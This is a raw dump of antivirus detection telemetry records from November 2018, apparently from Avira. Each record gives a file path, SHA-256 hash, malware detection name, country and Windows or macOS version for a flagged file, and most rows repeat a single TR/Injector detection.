  Row(detection=Row(filename='avscan-20181102-061447-9170802c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061447-9170802C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152209-4632331a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152209-4632331A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:25:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055218-6dab602d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055218-6DAB602D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054644-a6640c6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054644-A6640C6D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174155-104d7713', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e78b00be\\AVSCAN-20181102-174005-0241EF08\\AVSCAN-20181102-174155-104D7713', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:41:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='docks.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\DOCKS\\DOCKS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-223618-d8749560', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_71c8597a\\AVSCAN-20181102-223604-D628443D\\AVSCAN-20181102-223618-D8749560', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:36:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053014-583baca1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053014-583BACA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054924-05fcff85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054924-05FCFF85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060534-47e4e5a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060534-47E4E5A0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052336-6af6db52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052336-6AF6DB52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062648-3f6f2b01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062648-3F6F2B01', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054521-7526983a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054521-7526983A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061842-1d92f656', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061842-1D92F656', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052728-f58fa7f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052728-F58FA7F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050949-7e45c98a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050949-7E45C98A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062556-206a3d2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062556-206A3D2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062104-72649ec2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062104-72649EC2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052819-13ca3e70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052819-13CA3E70', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061755-019e3a88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061755-019E3A88', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050951-7f56e8a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050951-7F56E8A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051043-9ebb289b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051043-9EBB289B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050945-7ba575a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050945-7BA575A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055140-572a1bc4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055140-572A1BC4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051802-a472a06c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051802-A472A06C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052439-907fd907', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052439-907FD907', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050914-698cb231', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050914-698CB231', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055352-a5d17064', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055352-A5D17064', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053852-8d43857b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053852-8D43857B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061837-1ad039cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061837-1AD039CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051353-0fc6e123', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051353-0FC6E123', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060754-9bd01313', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060754-9BD01313', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060932-d6157ba1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060932-D6157BA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062255-b4c90936', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062255-B4C90936', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054156-fb2ec5a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054156-FB2EC5A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053728-5b1668d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053728-5B1668D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:28:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\總務管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='7d212a13fe31a353877c5ff97f32c941482bbab04f9e03a2d98f6f385849ad25', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='81c7884894c8204284fcd9a931ecc21e5091366ac3e6b0bb22d16d65b6f7dce4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\81C7884894C8204284FCD9A931ECC21E5091366AC3E6B0BB22D16D65B6F7DCE4', filesize=64000, name='TR/Dropper.Gen.#M300.#R3497'), hash='81c7884894c8204284fcd9a931ecc21e5091366ac3e6b0bb22d16d65b6f7dce4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053534-17187c7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053534-17187C7C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053826-7dfbf623', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053826-7DFBF623', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050836-52be9c26', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050836-52BE9C26', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:06:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050452-cd04c412', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050452-CD04C412', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062256-b5666ca4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062256-B5666CA4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053426-ee9df2f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053426-EE9DF2F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060128-b571af39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060128-B571AF39', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\ASUS Update\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='889f3913186ad848c1d0fa352980995ccb7931c21935928e7efb390d916ee905', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:55:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062359-dad9f922', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062359-DAD9F922', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051215-d55712d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051215-D55712D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:17:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051947-e2c059be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051947-E2C059BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050538-e8aba18d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050538-E8ABA18D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:37Z'), dt=datetime.date(2018, 11, 2)),
